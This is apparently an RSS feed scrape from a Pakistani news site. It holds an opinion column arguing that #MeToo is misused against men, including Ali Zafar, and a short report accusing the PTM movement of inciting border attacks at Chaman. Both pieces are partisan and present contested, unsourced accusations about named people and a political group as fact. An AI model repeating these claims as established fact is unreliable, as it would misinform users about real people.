I’ve always been the kind of person who has spoken up against injustice, even if it is by someone I support. If Ali Zafar has misspoken anywhere, I would say that that is wrong. If Meesha Shafi has leveled false allegations against Mr Zafar, I would say that is wrong. If Imran Khan has misbehaved with any supporter, I would say that is wrong. If Bilawal Bhutto has misbehaved with any supporter, I would call it wrong as well. And while we can’t help party supporters only seeing one side of the story, as journalists or activists, we must stand for what is right. Unfortunately, the leftist media in Pakistan has made a scapegoat out of Ali Zafar the same way it has turned Imran Khan’s government into its favorite joke.

Why Are We Not Talking About False Accusations?

Harassment is an age-old phenomenon and speaking up about it is also not new.

Neither are false allegations.

Concurrently, why are feminists afraid of owning up to the power of #MeToo? This allegation is powerful and it does ruin lives of people: those who are actually guilty must be taken to court and must be held accountable. But we cannot ‘flatten stories in a hashtag’ as many commentators have said about the movement. The hashtag has many stories and not all of them can be equated with each other.

And that is why we must also penalize and hold accountable everyone who is ‘using’ this movement and this powerful hashtag to attack, malign and hate. #MeToo is being weaponized. Just recently filmmaker and outspoken critic of PM Modi’s regime, Anurag Kashyap, was accused of sexual assault. Similarly, the late Sushant Singh Rajput was also slammed with a ‘#MeToo’ allegation.

The same way Johnny Depp was constantly painted as an abuser/wife-beater whereas as audiotapes and videos revealed that Amber Heard admitted to hitting him. Gary Oldman faced the ignominy when he won an Oscar and liberals/feminists were disgusted because he had domestic violence allegations. Many days later, it was Oldman’s son himself who stated the allegations are untrue. There are many people who have been facing these controversies since then. Justin Beiber and Cole Sprouse also had to defend themselves in the face of the allegations they faced via anonymous accounts. If you start going through what men have had to face over false allegations, the list is harrowing. Suicides, termination, mental and emotional distress.

There has been a significant backlash of #MeToo in the United States where it was reported that men are now uncomfortable working with women because they are afraid of being alleged as harassers. How is this making the world a better place where men and women can’t even work together professionally? This merely shows that #MeToo is a powerful movement and must not be, at any cost, allowed to ruin innocent men’s lives because this isn’t a war against one man or the men we don’t know. This is a movement for social change that encourages women to speak up about their experiences and for men to learn and for abusers to be held accountable.

10 PAKISTANI DRAMAS OF THE PAST TEN YEARS THAT WE THINK IMRAN KHAN SHOULD WATCH

The Opposite of Patriarchy is Not Misandry; the Opposite of Sexual Harassment is Not Scapegoating Innocent People!

The opposite of patriarchy is neither matriarchy nor misandry – what I strive for as a feminist, is a society that holds men and women equally responsible. For example, no one should be asking a woman who has been assaulted what she was wearing or if she incited the rapist to assault her.

What I do want is that rapists, assaulters, abusers, molesters all face the strictest face of the law and are held accountable for the pain and the agony they cause upon their victims. I want a society where men are able to share their emotions without being called ‘sissies’ or being told they have to ‘man up’ to shed a tear. I want a society where men can also freely express their experiences of assault and abuse without shame and fear of losing their ‘masculinity’. The war is against apathy, indifference and hate. The war is for speaking the truth, even if it is uncomfortable or unpopular.

The war is not for every woman to be a part of a clique of mean girls but to empower women to speak up, hold abusers responsible then and there and create support systems for such women. Due to the sensitive and secretive nature of the assault, sexual abuse matters continue to go unreported: this is what we must all fight. There is no shame in speaking up and talking about abuse. And there is no shame in surviving abuse.

]]>
14683
What was the purpose of the PTM Chaman rally? Secrets revealed https://concepttvnews.com/?p=14609&utm_source=rss&utm_medium=rss&utm_campaign=what-was-the-purpose-of-the-ptm-chaman-rally-secrets-revealed Mon, 30 Nov 2020 15:00:48 +0000 https://concepttvnews.com/?p=14609 Chaman is a significant employment trade border between Pakistan and Afghanistan. A few days ago, PTM staged a protest to provoke a dispute over the border and incited the members to launch a provocation against Pakistani security forces.

The PTM leaders raised Afghan flags at the protest rally and abused Pakistani security and administrative agencies and said that smuggling will be carried on at the Chaman border and we will resist those who stop them.

Immediately after the PTM protest rally, the smugglers from Afghanistan and Pakistan started acting as if the plan was already completed and they were just waiting for the protest rally. Yesterday, smugglers and PTM members attacked the Pakistan FC and other government offices along the border at Chaman and injured government and security officials.

In response, Pakistani security forces launched an operation against them and fired shots in the air. They fired tear gas and some rubber bullets to reduce the force, injuring one person. PTM did their best to harm the nation for the anti-state agents. It is a pity that now the PTM leaders on Twitter and other social media are once again trying to mislead the Pakhtuns and spread false propaganda.

]]>
14609